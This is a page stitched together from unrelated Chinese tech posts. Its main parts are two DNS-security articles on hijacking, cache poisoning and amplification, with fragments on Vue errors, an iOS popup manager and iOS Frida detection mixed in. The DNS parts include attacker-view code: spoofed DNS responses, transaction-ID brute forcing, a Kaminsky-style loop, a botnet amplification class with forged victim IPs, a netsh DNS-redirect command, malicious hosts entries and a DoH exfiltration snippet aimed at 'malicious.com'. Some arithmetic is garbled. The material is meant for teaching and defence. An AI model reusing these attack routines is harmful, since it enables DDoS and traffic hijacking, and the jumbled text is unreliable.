模拟产生 Vue 层级的错误:给一个字符串类型的数据,在计算属性里调用 toFixed 方法。按钮的点击事件里将数据改为字符串,则会报错。 可以看到被 Vue.config.errorHandler 捕获了,后续交给 Native 处理即可。

WeexMockVueAPM.png

DNS安全威胁:从劫持、污染到放大攻击的演练

前言:DNS——互联网的“隐形电话簿”

想象一下,如果没有DNS,访问每个网站都需要记住一串像192.168.1.1这样的数字。DNS让互联网变得人性化,但正是这个每日处理数千亿次查询的系统,却成为了网络攻击者的黄金目标。今天,我们将深入探索DNS世界的阴暗面,了解那些威胁我们网络安全的各种攻击手段。

一、DNS劫持:当你的导航系统被黑客接管

1.1 什么是DNS劫持?

DNS劫持就像有人修改了你的GPS导航系统,将“前往银行”的指令变成了“前往黑客的假银行”。

技术原理: 攻击者通过中间人攻击或恶意软件,篡改DNS响应,将合法域名解析到恶意IP地址。

# 攻击者视角的DNS劫持流程
def dns_hijack_attack():
    # 1. 监控网络流量
    sniff_packets(filter="udp port 53")
    
    # 2. 拦截DNS查询
    if packet.haslayer(DNS) and packet[DNS].qd.qname == "bank.com":
        # 3. 伪造响应,指向恶意服务器
        malicious_ip = "192.168.1.100"
        send_spoofed_response(packet, malicious_ip)
    
    # 用户访问bank.com,实际连接到攻击者服务器

1.2 劫持的多种形式

路由器劫持

# 攻击者攻破家用路由器后修改DNS设置
# 原始配置:
# nameserver 8.8.8.8  # Google DNS

# 被篡改后:
# nameserver 10.0.0.1  # 攻击者控制的DNS服务器

本地Hosts文件劫持

# Windows hosts文件位置:C:\Windows\System32\drivers\etc\hosts
# 恶意软件添加:
192.168.1.100  www.bank.com
192.168.1.100  www.paypal.com
# 所有银行访问都重定向到攻击者服务器

ISP级别的劫持

// 某些ISP会劫持不存在的域名
// 用户查询:nonexistent-website.com
// 正常响应:NXDOMAIN(域名不存在)
// 劫持响应:指向ISP的广告或搜索页面

1.3 真实案例:巴西银行大劫案

2016年巴西银行攻击

  • 手法:恶意软件修改路由器和电脑的DNS设置
  • 目标:40多家巴西银行
  • 损失:数百万美元
  • 技术细节
    # 恶意软件执行的DNS修改
    import subprocess
    
    # 修改Windows DNS设置
    subprocess.run([
        'netsh', 'interface', 'ip', 'set', 'dns',
        'Ethernet', 'static', '185.228.168.168'
    ])
    
    # 185.228.168.168是攻击者控制的恶意DNS服务器
    

二、DNS污染:在互联网水源中投毒

2.1 DNS污染的工作原理

DNS污染又称DNS缓存投毒,攻击者向DNS缓存中注入虚假记录。

攻击时序图

sequenceDiagram
    用户->>本地DNS: 查询 evil.com
    本地DNS->>根服务器: 查询 .com NS
    攻击者->>本地DNS: 伪造响应(假的权威服务器)
    本地DNS->>假权威服务器: 查询 evil.com
    假权威服务器->>本地DNS: 返回恶意IP
    本地DNS->>用户: 返回恶意IP
    用户->>恶意网站: 访问 (被攻击)

2.2 技术实现细节

class DNSPoisoningAttack:
    def __init__(self, target_dns_server):
        self.target = target_dns_server
        self.transaction_id = random.randint(0, 65535)
    
    def poison_cache(self, domain, malicious_ip):
        # 关键:预测DNS查询的Transaction ID
        for txid in range(65536):
            # 伪造权威服务器响应
            spoofed_response = IP(dst=self.target)/UDP(dport=53)/DNS(
                id=txid,
                qr=1,  # 响应标志
                qd=DNSQR(qname=domain),
                an=DNSRR(rrname=domain, ttl=86400, rdata=malicious_ip)
            )
            send(spoofed_response)
            
            # 同时发送大量查询触发目标DNS的查询
            trigger_query = IP(dst=self.target)/UDP()/DNS(
                id=txid,
                qd=DNSQR(qname=domain)
            )
            send(trigger_query)

2.3 Kaminsky漏洞:改变游戏规则

2008年发现,允许攻击者在秒级时间内污染DNS缓存:

def kaminsky_exploit(target_dns, domain):
    # 1. 查询目标域名的子域名(每次不同)
    for i in range(1000):
        subdomain = f"{random_string(10)}.{domain}"
        
        # 2. 触发目标DNS向上游查询
        send_query(target_dns, subdomain)
        
        # 3. 发送大量伪造响应,尝试预测Transaction ID
        for txid in range(65536):
            send_spoofed_response(
                target_dns,
                subdomain,
                malicious_ip,
                txid
            )
        
        # 4. 如果成功,整个域的缓存都被污染
        if check_poisoned(target_dns, domain):
            return True
    
    return False

三、DNS放大攻击:小问题引发大灾难

3.1 放大效应的数学原理

基本公式:放大倍数 = 响应大小 / 查询大小

查询例子:example.com ANY (60字节)
响应例子:包含所有记录类型 (4000字节)
放大倍数:4000 ÷ 6067

不同类型记录的放大效果

记录类型 查询大小 典型响应 放大倍数
A记录 60字节 100字节 1.7倍
MX记录 60字节 500字节 8.3倍
TXT记录 60字节 3000字节 50倍
ANY记录 60字节 4000字节 67倍
DNSSEC 60字节 4000+字节 70+倍

3.2 僵尸网络的规模化攻击

class DDoSBotnet:
    def __init__(self, bot_count=10000):
        self.bots = self.load_bots(bot_count)
        self.open_dns_servers = self.scan_open_resolvers()
    
    def launch_amplification_attack(self, victim_ip):
        # 每个僵尸执行
        for bot in self.bots:
            # 选择放大倍数最高的记录类型
            record_type = self.select_optimal_record()
            
            # 构造伪造请求
            query = DNS(
                id=random.randint(0, 65535),
                qd=DNSQR(qname=self.target_domain, qtype=record_type)
            )
            
            # 发送到多个开放DNS服务器
            for dns_server in self.open_dns_servers[:10]:
                spoofed_packet = IP(
                    src=victim_ip,  # 伪造源地址
                    dst=dns_server
                )/UDP(sport=random_port(), dport=53)/query
                
                bot.send(spoofed_packet)
        
        # 计算总攻击流量
        total_traffic = self.calculate_amplification()
        print(f"理论最大流量:{total_traffic/1e9:.2f} Gbps")

3.3 史上最大攻击:Dyn DNS事件分析

2016年10月21日,针对Dyn DNS服务的攻击:

攻击参数:
  峰值流量: 1.2 Tbps
  持续时间: 持续多波,每波约1小时
  攻击源: 10-100万台IoT设备组成的Mirai僵尸网络
  放大载体: 开放DNS递归服务器 + NTP放大
  受影响服务:
    - Twitter: 全球中断2小时
    - GitHub: 服务严重降级
    - Netflix: 美国东海岸用户无法访问
    - 纽约时报、华尔街日报等: 访问困难
  
技术细节:
  1. 攻击组合: DNS放大 + NTP放大 + SYN Flood
  2. 查询类型: 主要使用ANY和TXT记录
  3. 伪造技术: 源地址随机化,难以追踪
  4. 躲避策略: 动态更换攻击目标和服务

四、现代DNS威胁演进

4.1 DoH/DoT的新型威胁

DNS over HTTPS (DoH) 的安全悖论

// DoH虽然加密,但引入新问题
const dohThreats = {
    // 1. 中心化风险
    centralization: {
        providers: ['Cloudflare', 'Google', 'Quad9'],
        risk: '单点故障,隐私集中'
    },
    
    // 2. 企业监控困难
    enterprise: {
        issue: '绕过公司DNS策略',
        example: '恶意软件使用DoH外联C2服务器'
    },
    
    // 3. 协议识别问题
    detection: {
        challenge: 'DoH流量与普通HTTPS难以区分',
        solution: '深度包检测(DPI)'
    }
};

// 恶意软件利用DoH的示例
class MalwareWithDoH {
    async exfiltrateData(data) {
        // 使用DoH隐藏DNS查询
        const dohUrl = 'https://cloudflare-dns.com/dns-query';
        const query = btoa(JSON.stringify(data));
        
        // 将数据编码在DNS查询中
        const response = await fetch(`${dohUrl}?name=${query}.malicious.com`);
        
        // 攻击者DNS服务器解析查询,提取数据
        return response.ok;
    }
}

4.2 子域名劫持攻击

class SubdomainTakeover:
    def find_vulnerable_subdomains(self, domain):
        # 1. 枚举所有子域名
        subdomains = self.enumerate_subdomains(domain)
        
        vulnerable = []
        for sub in subdomains:
            # 2. 检查DNS记录但无主机服务的情况
            dns_record = self.resolve_dns(sub)
            
            if dns_record and self.check_service_status(sub) == 'no_host':
                # 3. 常见易受攻击服务
                if dns_record['type'] in ['CNAME', 'NS']:
                    target = dns_record['value']
                    
                    # 4. 检查是否可以接管
                    if self.can_takeover(target):
                        vulnerable.append({
                            'subdomain': sub,
                            'record_type': dns_record['type'],
                            'target': target,
                            'risk': self.assess_risk(sub)
                        })
        
        return vulnerable

# 攻击示例:接管Heroku应用
# 1. 公司配置:help.example.com CNAME -> help.herokuapp.com
# 2. 公司删除了Heroku应用,但忘记删除DNS记录
# 3. 攻击者注册help.herokuapp.com
# 4. 所有访问help.example.com的用户到达攻击者页面

4.3 量子计算对DNS安全的威胁

未来的威胁

class QuantumDNSThreat:
    def quantum_dns_attack(self, encrypted_traffic):
        # 量子计算机可以破解当前加密算法
        algorithms_vulnerable = {
            'RSA-2048': '易受Shor算法攻击',
            'ECC-256': '易受Shor算法攻击',
            'AES-256': '需Grover算法,但可增强密钥'
        }
        
        # 对DNSSEC的影响
        dnssec_vulnerabilities = [
            'RSA签名可被伪造',
            '密钥交换可能被截获',
            '需要后量子密码学'
        ]
        
        # 防御策略
        defenses = {
            '当前': 'DNSSEC + TLS 1.3',
            '过渡': '混合加密(经典+量子安全)',
            '未来': '后量子密码学标准'
        }

五、全面防御策略

5.1 多层次防御体系

graph TB
    A[用户层] --> B{防御措施}
    B --> C[使用DoH/DoT]
    B --> D[定期检查Hosts文件]
    B --> E[保持软件更新]
    
    F[应用层] --> G{防御措施}
    G --> H[实现DNSSEC验证]
    G --> I[使用证书锁定]
    G --> J[多CDN策略]
    
    K[网络层] --> L{防御措施}
    L --> M[部署BCP38]
    L --> N[DNS防火墙]
    L --> O[流量清洗中心]
    
    P[DNS运营者] --> Q{防御措施}
    Q --> R[关闭开放递归]
    Q --> S[实施RRL]
    Q --> T[DNSSEC部署]

5.2 技术实现代码

DNSSEC验证实现

import dns.resolver
import dns.dnssec
import dns.rdatatype

class DNSSECValidator:
    def validate_with_dnssec(self, domain):
        try:
            # 1. 获取DNSKEY记录
            dnskey_response = dns.resolver.resolve(domain, 'DNSKEY')
            
            # 2. 获取RRSIG记录
            rrsig_response = dns.resolver.resolve(domain, 'RRSIG')
            
            # 3. 验证签名链
            dns.dnssec.validate(
                dnskey_response.rrset,
                rrsig_response.rrset,
                {domain: dnskey_response.rrset}
            )
            
            print(f"✓ {domain} DNSSEC验证通过")
            return True
            
        except dns.dnssec.ValidationFailure as e:
            print(f"✗ {domain} DNSSEC验证失败: {e}")
            return False
        except dns.resolver.NoAnswer:
            print(f"? {domain} 未配置DNSSEC")
            return None

DNS防火墙规则示例

# 使用iptables构建DNS防火墙
#!/bin/bash

# 1. 基础防护
iptables -A INPUT -p udp --dport 53 -m state --state NEW -m recent \
  --set --name dnsquery --rsource

# 2. 限制查询频率
iptables -A INPUT -p udp --dport 53 -m state --state NEW -m recent \
  --update --seconds 1 --hitcount 5 --name dnsquery --rsource -j DROP

# 3. 阻止ANY查询攻击
iptables -A INPUT -p udp --dport 53 -m string \
  --algo bm --hex-string "|00ff0001|" -j DROP

# 4. 响应速率限制(使用DNS服务器功能)
# BIND配置:
# rate-limit {
#   responses-per-second 10;
#   slip 2;
#   window 5;
# };

# 5. 监控和报警
iptables -A INPUT -p udp --dport 53 -j LOG \
  --log-prefix "DNS-Query: " --log-level 6

5.3 企业级防护架构

class EnterpriseDNSProtection:
    def __init__(self):
        self.components = {
            'dns_firewall': DNSFirewall(),
            'traffic_analyzer': TrafficAnalyzer(),
            'threat_intel': ThreatIntelligence(),
            'automated_response': AutoResponder()
        }
    
    def protect_network(self):
        # 1. 实时流量分析
        while True:
            packet = capture_packet()
            
            # 2. DNS特定检测
            if packet.haslayer(DNS):
                threat_score = self.analyze_dns_packet(packet)
                
                # 3. 威胁情报匹配
                if self.threat_intel.check_ioc(packet):
                    self.block_and_alert(packet)
                
                # 4. 行为分析
                elif threat_score > self.threshold:
                    self.rate_limit_or_block(packet)
                
                # 5. 学习模式
                else:
                    self.update_baseline(packet)
    
    def analyze_dns_packet(self, packet):
        score = 0
        
        # 检测指标
        indicators = {
            'query_length': len(packet[DNS].qd.qname),
            'query_type': packet[DNS].qd.qtype,
            'response_size': len(packet) if packet[DNS].qr else 0,
            'client_history': self.get_client_history(packet[IP].src),
            'domain_reputation': self.check_domain_reputation(packet[DNS].qd.qname)
        }
        
        # 评分规则
        if indicators['query_type'] == 255:  # ANY查询
            score += 20
        
        if indicators['response_size'] > 2000:  # 大响应
            score += 15
        
        if indicators['domain_reputation'] == 'malicious':
            score += 50
        
        return score

5.4 个人用户防护指南

# 个人DNS安全自查清单

## 立即检查项目
- [ ] 路由器管理员密码是否已修改(不要使用admin/admin)
- [ ] 路由器固件是否最新版本
- [ ] 电脑Hosts文件是否被异常修改
- [ ] 是否使用可靠的DNS服务器(如8.8.8.8, 1.1.1.1)

## 浏览器安全设置
1. Chrome/Firefox: 启用DoH
2. 使用HTTPS Everywhere扩展
3. 禁用不安全的插件

## 网络习惯
- 避免连接公共Wi-Fi进行敏感操作
- 定期检查银行账户异常
- 对异常重定向保持警惕

## 工具推荐
- DNSLeakTest.com: 检测DNS泄露
- GRC DNS Benchmark: 测试DNS性能和安全
- Wireshark: 高级用户网络分析

六、未来展望:DNS安全的演进

6.1 新技术标准

正在发展的标准

1. DNS over QUIC (DoQ)
   - 结合QUIC协议的优点
   - 更好的连接迁移和丢包恢复

2. Oblivious DNS over HTTPS (ODoH)
   - 添加代理层,隐藏用户身份
   - 解决DoH的中心化隐私问题

3. 后量子DNS安全
   - NIST后量子密码学竞赛获胜者
   - 抗量子计算的DNSSEC

6.2 人工智能在DNS安全中的应用

class AIDNSDefender:
    def __init__(self):
        self.model = self.train_ai_model()
    
    def train_ai_model(self):
        # 使用历史攻击数据训练
        features = [
            'query_frequency',
            'response_amplification',
            'domain_entropy',
            'geographic_anomaly',
            'temporal_pattern'
        ]
        
        # 深度学习检测
        model = Sequential([
            Dense(128, activation='relu', input_shape=(len(features),)),
            Dropout(0.3),
            Dense(64, activation='relu'),
            Dense(32, activation='relu'),
            Dense(1, activation='sigmoid')  # 攻击概率
        ])
        
        return model
    
    def realtime_detection(self, dns_traffic):
        predictions = self.model.predict(dns_traffic)
        
        # 自适应阈值
        threshold = self.calculate_dynamic_threshold()
        
        attacks_detected = predictions > threshold
        
        # 自动化响应
        for i, is_attack in enumerate(attacks_detected):
            if is_attack:
                self.trigger_response(dns_traffic[i])

总结:构建深度防御体系

DNS安全不是单一技术能解决的问题,而是需要多层次、多维度的防御

  1. 协议层:DNSSEC、DoH/DoT、响应速率限制
  2. 网络层:BCP38、流量清洗、防火墙规则
  3. 应用层:证书锁定、CSP策略、子域名监控
  4. 用户层:安全意识、安全工具、良好习惯

记住:攻击者只需要找到一个漏洞,而防御者需要保护整个系统。DNS安全是一场持续的战斗,需要技术、策略和警惕性的结合。

随着新技术(如量子计算、5G、物联网)的发展,DNS攻击面只会越来越大。但只要我们持续学习、适应和创新,就能在这个不断变化的威胁环境中保持安全。

一个管理项目中所有弹窗的弹窗管理器(PopupManager)

文章贴图需求.png

基于什么原因 PopupManager 的产生?

现在有这么一个业务需求,需要在某个界面或者在 window 上面添加一个弹窗。这个时候在你的大脑中你会想到怎么样的实现方案呢?欢迎在下面的评论区说出你的方案。期待你们的回答😁
后面在需求迭代的过程中,在同一个界面就会出现不止一个弹窗的时候。这个时候你又会怎么处理这些弹窗的弹出顺序呢?欢迎在下面的评论区说出你的方案。期待你们的回答😁

改造之前的实现方式

单一的弹窗,我们就是直接通过自定义View 然后在当前的控制器弹出或者获取keyWindow 然后添加弹窗。
多弹窗的时候就会通过一堆的 BOOL 值做标志,然后在弹出之前做了一堆的逻辑判断,来判断当前应该弹出某一个弹窗。
这样的实现方式,对于一个人一直负责的业务可能会实现起来简单一些,但是在人员交替的时候,会让后面的人对逻辑代码产生很多困惑。所以我们就在想这个要怎么去做一些改造。

改造

我们一开始的思路就是项目中的所有弹窗都由一个单例来控制,把所有需要添加的弹窗存放在一个数组中,在需要弹出的时候取出第一个弹窗,然后统一的在 keyWindow 上添加。如果已经有弹窗的时候,就会不会添加弹窗。

遇到的问题---1.弹窗显示的在哪个界面

首先把弹窗都添加在 keyWindow 上的时候,有的业务逻辑是不需要的。所以我们就增加了一个targetViewControllerClasses 的属性,用来告诉管理器,你是要在哪个控制器显示弹窗。这样,每一个弹窗就有了自己应该显示的控制器。

遇到的问题---2.弹窗有可能会有显顺序的调整

这个出现的时机是因为,项目中弹窗的数据都是后台给的,但是会分布在不同的接口返回的。如果是统一接口那么可以用数据返回的顺序来控制弹出的顺序,但是这样的方案明显是不实际的。后面在再看了很多成熟的方案后,我们也和后台商量对项目中的所有弹窗增加优先级的属性。
我们就一开始存储弹窗的数组进行逻辑调整,对数组中的数据基于优先级的大小做了从大到小的排序,这样就可以优先弹出啊优先级高的弹窗,如果优先级相同的时候就是看先进入数组的会先弹出。这样就保证了项目中的一个简单需求。

示例

自己实现的弹窗都要遵循我们的<PopupProtocol>协议,那么现在做个简单示例。

PopupView *popupViewFirst1 = [[PopupView alloc] initWithPopupPriority:5 message:@"等待的弹窗 优先级为5"];
[PopupManager.sharedManager addPopupView:popupViewFirst1];

传送门github.com/cAibDe/Popu…

扩展了解DNS放大攻击:原理、影响与防御

什么是DNS放大攻击?

DNS放大攻击(DNS Amplification Attack)是一种分布式拒绝服务攻击(DDoS)的变种,攻击者利用DNS协议的查询-响应不对称性开放DNS服务器,通过发送小型请求来触发大量响应的攻击方式。


攻击原理:三要素结合

1. 放大效应(Amplification)

DNS查询和响应的大小差异创造了放大倍数:

请求: "example.com的IP是多少?"  (约60字节)
响应: "example.com的IP是...还有很多其他信息" (可达4000+字节)

放大倍数 = 响应大小 / 请求大小 典型放大倍数:10-50倍,某些情况下可达100倍以上。

2. IP地址欺骗(IP Spoofing)

攻击者伪造源IP地址:

正常: 攻击者IP → DNS服务器 → 攻击者IP
攻击: 伪造受害者IP → DNS服务器 → 受害者IP

3. 开放DNS递归服务器(Open Recursive Resolvers)

允许任何人查询的DNS服务器(本应只服务特定网络)。


攻击过程详解

sequenceDiagram
    participant A as 攻击者 (Attacker)
    participant B as 被控僵尸设备 (Botnet)
    participant D as 开放式DNS解析器 (放大器)
    participant V as 目标受害者 (Victim)

    Note over A, V: 攻击准备阶段
    A->>B: 控制大量僵尸设备(Botnet)
    A->>D: 侦察:寻找可滥用的开放式解析器
    
    Note over A, V: 攻击执行阶段(核心放大过程)
    A->>B: 指令:伪造源IP为V的地址,<br>向D发送小型DNS查询请求
    B->>D: 小型查询请求(如60字节)
    Note over D: DNS服务器处理查询,<br>并返回大型响应(如4000字节)
    D-->>V: 将大型响应发送至伪造的源IP(受害者V)
    
    Note over A, V: 攻击影响
    loop 海量流量持续涌向V
        D-->>V: 超大规模UDP响应数据包
    end
    Note right of V: 受害者网络带宽被耗尽<br>(服务瘫痪)

步骤分解

graph LR
    A[攻击者] -->|1. 伪造受害者IP| B[DNS查询]
    B -->|2. 发送小查询| C[开放DNS服务器]
    C -->|3. 执行递归查询| D[权威DNS服务器]
    C -->|4. 返回大响应| E((受害者))
    E -->|流量淹没| F[受害者服务瘫痪]

实际攻击示例

# 攻击者视角的简化流程
def dns_amplification_attack(victim_ip, dns_server, domain):
    # 1. 构造小的DNS查询数据包
    dns_query = create_dns_query(domain, record_type="ANY")
    # 大小: ~60字节
    
    # 2. 伪造源IP为受害者IP
    spoofed_packet = IP(src=victim_ip, dst=dns_server) / UDP() / dns_query
    
    # 3. 大量发送(使用僵尸网络)
    for _ in range(100000):
        send(spoofed_packet)
    
    # DNS服务器响应:~4000字节 × 100000 = 400MB流量涌向受害者

为什么DNS容易成为攻击目标?

技术原因

  1. 协议设计缺陷

    • DNS使用无连接的UDP协议,易于伪造源地址
    • 缺乏源地址验证机制
  2. 响应数据量大

    # 查询ANY记录会返回所有类型记录
    查询: example.com ANY
    
    响应可能包含:
    - A记录 (IPv4地址)
    - AAAA记录 (IPv6地址)
    - MX记录 (邮件服务器)
    - TXT记录 (文本信息)
    - NS记录 (域名服务器)
    - SOA记录 (起始授权)
    - CNAME记录 (别名)
    - 等等...
    
  3. 开放递归服务器

    • 全球有数百万台配置不当的DNS服务器
    • 缺乏访问控制

放大倍数对比

记录类型 查询大小 响应大小 放大倍数
A记录 60字节 约100字节 1.7倍
ANY记录 60字节 4000+字节 67倍
TXT记录 60字节 3000+字节 50倍
DNSSEC 60字节 可超过4000字节 67+倍

真实案例:史上最大的DDoS攻击

2013年:Spamhaus攻击

  • 峰值流量: 300 Gbps
  • 持续时间: 多日
  • 放大倍数: 最高100倍
  • 攻击方式: 利用开放DNS递归服务器
  • 影响: 几乎瘫痪欧洲互联网基础设施

2016年:Dyn攻击

  • 目标: Dyn DNS服务商(为Twitter、GitHub等提供服务)
  • 峰值流量: 1.2 Tbps
  • 攻击源: Mirai僵尸网络 + DNS放大
  • 影响: 大半个美国东海岸无法访问主要网站

防御措施:多层次防御

1. DNS服务器运营者

关闭开放递归

# BIND DNS服务器配置示例
options {
    # 仅允许本地网络查询
    allow-query { 
        localhost; 
        192.168.0.0/16;  # 内部网络
    };
    
    # 限制递归查询
    allow-recursion {
        localhost;
        192.168.0.0/16;
    };
    
    # 启用响应速率限制
    rate-limit {
        responses-per-second 10;
        window 5;
    };
}

实施响应策略

# 伪代码:DNS服务器防护逻辑
class DNSServerProtection:
    def handle_query(self, query, client_ip):
        # 1. 检查查询频率
        if self.is_rate_limited(client_ip):
            return self.rate_limit_response()
        
        # 2. 限制ANY查询
        if query.type == "ANY":
            # 返回最小必要信息,或拒绝
            return self.minimal_response(query)
        
        # 3. 检查查询大小
        if len(query.data) < self.MIN_QUERY_SIZE:
            # 可能是攻击包
            return self.drop_query()
        
        # 4. 验证源地址(BCP38)
        if not self.validate_source_ip(client_ip, query.src_port):
            return self.drop_query()
        
        # 正常处理
        return self.process_query(query)

2. 网络运营商

实施BCP38(源地址验证)

# 边界路由器配置(Cisco示例)
interface GigabitEthernet0/0
 ip verify unicast source reachable-via rx  # 启用源地址验证

部署流量清洗中心

graph TD
    A[攻击流量] --> B[运营商网络]
    B --> C{检测系统}
    C -->|正常流量| D[目标服务器]
    C -->|攻击流量| E[清洗中心]
    E --> F[过滤后流量] --> D
    E --> G[丢弃恶意流量]

3. 应用开发者/网站所有者

使用CDN服务

// Cloudflare等CDN提供自动DDoS防护
// DNS配置示例
const dnsConfig = {
    "type": "CNAME",
    "name": "www.example.com",
    "content": "example.com.cdn.cloudflare.net",
    "proxied": true,  // 启用代理(流量经过清洗)
    "ttl": 300
};

多DNS提供商策略

# 使用多个DNS提供商分散风险
class ResilientDNS:
    def __init__(self):
        self.providers = [
            '8.8.8.8',      # Google DNS
            '1.1.1.1',      # Cloudflare DNS
            '208.67.222.222'# OpenDNS
        ]
    
    def resolve_with_fallback(self, domain):
        for dns_server in self.providers:
            try:
                ip = self.query_dns(domain, dns_server)
                if ip:
                    return ip
            except TimeoutError:
                continue
        raise DNSResolutionError("所有DNS服务器均失败")

4. 普通用户/设备所有者

防止设备成为僵尸网络

# 检查路由器是否安全
# 1. 更改默认密码
# 2. 禁用UPnP(如果不需要)
# 3. 更新固件
# 4. 关闭WAN口管理

# 检查IoT设备
nmap -sU -p 53 <device-ip>  # 检查是否开放DNS服务

检测与监控

攻击特征识别

class DnsAmplificationDetector:
    ATTACK_SIGNATURES = {
        'high_udp_53_traffic': {
            'threshold': 1000,  # 包/秒
            'action': 'alert'
        },
        'spoofed_dns_queries': {
            'detection': '检查源IP是否属于本地网络',
            'action': 'block'
        },
        'any_query_flood': {
            'threshold': 100,   # ANY查询/秒
            'action': 'rate_limit'
        }
    }
    
    def analyze_traffic(self, packets):
        stats = {
            'dns_query_count': 0,
            'dns_response_count': 0,
            'query_response_ratio': 0,
            'any_query_count': 0
        }
        
        for packet in packets:
            if packet.haslayer(DNS):
                if packet.dport == 53:  # DNS查询
                    stats['dns_query_count'] += 1
                    if packet[DNS].qd.qtype == 255:  # ANY类型
                        stats['any_query_count'] += 1
                elif packet.sport == 53:  # DNS响应
                    stats['dns_response_count'] += 1
        
        # 计算放大比
        if stats['dns_query_count'] > 0:
            stats['query_response_ratio'] = (
                stats['dns_response_count'] / stats['dns_query_count']
            )
        
        return self.evaluate_threat(stats)

监控指标

关键监控指标:
1. DNS查询/响应比例 > 10:1
2. ANY查询占比 > 5%
3. 来自单个IP的DNS查询 > 1000/秒
4. 响应包大小 > 1000字节
5. 伪造源地址的查询数量

未来趋势与新兴防御

DNS over TLS/HTTPS

# DNS over TLS (DoT)
使用端口853,加密DNS查询
# DNS over HTTPS (DoH)
使用HTTPS协议,完全加密

# 配置示例(Cloudflare DoH)
https://cloudflare-dns.com/dns-query?name=example.com&type=A

协议改进

DNS协议扩展:
1. DNS Cookies (RFC 7873)
   - 客户端和服务器交换"曲奇"验证
   - 防止源地址伪造

2. 0x20编码
   - 随机化查询中的字母大小写
   - 服务器验证响应使用相同大小写

3. 响应速率限制 (RRL)
   - 限制相同响应的发送频率

区块链DNS

// 概念:去中心化DNS防止单点故障
contract DecentralizedDNS {
    mapping(string => string) public records;
    
    function setRecord(string memory domain, string memory ip) public {
        require(msg.sender == owner[domain], "Not owner");
        records[domain] = ip;
    }
    
    function query(string memory domain) public view returns (string memory) {
        return records[domain];
    }
}

总结与建议

关键要点

  1. DNS放大攻击利用协议特性:UDP无连接 + 响应大于查询
  2. 攻击三要素:放大效应 + IP欺骗 + 开放递归服务器
  3. 防御需多层次:从协议、网络到应用层全面防护

立即行动项

  • DNS运营者:关闭开放递归,实施速率限制
  • 网络运营商:部署BCP38,建立清洗中心
  • 开发者:使用CDN,实施多DNS策略
  • 用户:保护设备,更新软件

长期策略

  1. 推动DNS-over-TLS/HTTPS普及
  2. 支持新的DNS安全扩展
  3. 建立全球协作的威胁情报共享

DNS放大攻击揭示了互联网基础设施的脆弱性,但也推动了网络安全技术的进步。通过技术改进和全球协作,我们可以构建更安全的网络环境。

iOS安全开发中的Frida检测

作者:luoyanbei@360src

随着移动应用安全机制的不断加强,以 Frida 为代表的动态插桩工具,已成为移动端逆向分析的主流手段。相比反汇编、class-dump 等静态分析方式,Frida 几乎可以在不修改 App 本体的情况下,实时注入代码、Hook 任意函数、篡改参数与返回值,甚至直接操控业务逻辑执行流程。

在越狱的iOS设备上,Frida 可以通过 frida-server 以最高权限运行;在非越狱设备上,也可以通过 Frida Gadget、调试注入、重签名等方式完成动态分析。

在实际攻击场景中,Frida 已被广泛用于: •绕过登录、风控、反作弊等安全校验 •Hook 网络层以抓取或篡改敏感接口数据 •直接调用内部私有方法,伪造正常业务流程 •分析加密算法、关键参数生成逻辑 •对安全检测逻辑本身进行反制与绕过

在 iOS App 中系统性地识别 Frida 的运行痕迹、注入特征和行为特征,并构建多层次的防御与对抗策略,已经成为移动端安全中不可回避的一环。本文将结合实际逆向与对抗经验,从安全开发的角度讲解frida检测相关特征。

1、检测frida默认端口号

如果设备上运行了 frida-server,并且使用默认端口号27042,App 尝试连接 127.0.0.1:27042,连接成功 说明当前环境下存在Frida使用27042端口。 具体检测端口代码:

#import <sys/socket.h>
#import <arpa/inet.h>
#import <fcntl.h>
#import <unistd.h>
#import <errno.h>

BOOL isFridaPortReallyOpen(void) {
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) return NO;

    // 非阻塞
    fcntl(sockfd, F_SETFL, O_NONBLOCK);

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(27042);
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");

    int ret = connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
    if (ret < 0 && errno != EINPROGRESS) {
        close(sockfd);
        return NO;
    }

    fd_set wfds;
    FD_ZERO(&wfds);
    FD_SET(sockfd, &wfds);

    struct timeval tv;
    tv.tv_sec = 0;
    tv.tv_usec = 300 * 1000; // 300ms

    ret = select(sockfd + 1, NULL, &wfds, NULL, &tv);
    if (ret <= 0) {
        close(sockfd);
        return NO;
    }

    // 关键:检查 SO_ERROR
    int so_error = 0;
    socklen_t len = sizeof(so_error);
    getsockopt(sockfd, SOL_SOCKET, SO_ERROR, &so_error, &len);

    close(sockfd);

    return so_error == 0;
}

调用方式

if (isFridaPortReallyOpen()) {
    NSLog(@"Frida 默认端口可访问");
    // 触发风控 / 上报 
}

基于 Frida 默认端口号(27042)的检测并非绝对可靠。一方面,理论上该端口可能被其他进程占用,从而在极少数情况下产生误报;另一方面,Frida 本身支持通过参数或二次编译的方式修改默认监听端口,一旦攻击者对 Frida Server 进行了“魔改”或端口重定向,该检测方式就可能被直接绕过。

因此,端口号检测更适合作为低成本、快速命中的辅助判断条件,而不应作为唯一的判定依据。将其与虚拟内存特征检测等更底层、更难完全抹除的手段进行组合使用,才能在实际对抗中获得更稳定、可信的检测效果。

2、检测app虚拟内存特征

当 Frida 附加到 iOS App 时,Frida 的代码、数据、JS runtime、字符串全部被加载到“目标 App 进程的虚拟内存空间”中。 Frida 的 JavaScript Runtime 会把“脚本字符串”放入内存,例如: require("frida-objc-bridge") frida/runtime/core.js Frida._loadObjC();

这些字符串来源于: •内置 JS 脚本(core.js) •bridge 初始化代码 •RPC 协议字符串(frida:rpc)

JS 引擎必须把字符串展开为明文才能执行,所以这些字符串一定存在于堆或只读区。

(1) Frida attach 的真实技术路径

以最典型的 frida-server attach为例:

  1. frida-server(系统进程):
    • 通过task_for_pid() 拿到目标 App 的 task port
  2. 在目标 App 中:
    • 创建远程线程(thread_create_running
    • 调用dlopen() / Mach-O loader
  3. Frida Agent 被加载:
    • 成为目标 App 的一个 dylib
    • 由 dyld 映射进App 的 VM

(2)app被frida附加后的特征关键词

序号 关键词 用途
1 frida_gadget 这是 Frida 在 native 层的“模块身份标识”
2 /frida-core/lib/gadget/gadget.vala 错误定位,日志,断言信息
3 frida/runtime/core.js 定义:Module / Memory / Interceptor、RPC、调度器
4 frida_agent_main Agent 的 native 入口,相当于 main() / init
5 frida_dylib_range= 这是 Frida 内部“自我感知内存边界”的关键字符串
6 /frida-core/lib/agent/agent.vala 错误定位,日志,断言信息
7 frida:rpc Agent <->Client 的通信协议前缀,JS / Native 双向调用标识
8 Frida._loadObjC(); 注册 ObjC / Java runtime,安装 hook handler
